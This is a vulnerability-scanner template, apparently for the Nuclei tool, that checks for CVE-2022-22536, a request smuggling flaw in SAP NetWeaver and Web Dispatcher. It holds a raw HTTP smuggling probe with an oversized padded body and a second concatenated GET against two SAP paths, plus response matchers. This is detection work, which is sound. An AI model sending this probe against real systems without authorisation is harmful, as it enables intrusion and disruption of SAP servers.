id: CVE-2022-22536 info: name: SAP Memory Pipes(MPI) Desynchronization author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - https://github.com/Onapsis/onapsis_icmad_scanner - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ tags: cve,cve2022,sap,smuggling requests: - raw: - |+ GET {{sap_path}} HTTP/1.1 Host: {{Hostname}} Content-Length: 82646 Connection: keep-alive {{repeat("A", 82642)}} GET / HTTP/1.1 Host: {{Hostname}} payloads: sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner - /sap/admin/public/default.html - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png unsafe: true read-all: true stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 - type: dsl dsl: - "contains(tolower(body), 'administration')" # confirms 1st path - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path condition: or - type: word part: body words: - "400 Bad Request" # error in concatenated response - "500 Internal Server Error" - "500 Dispatching Error" condition: or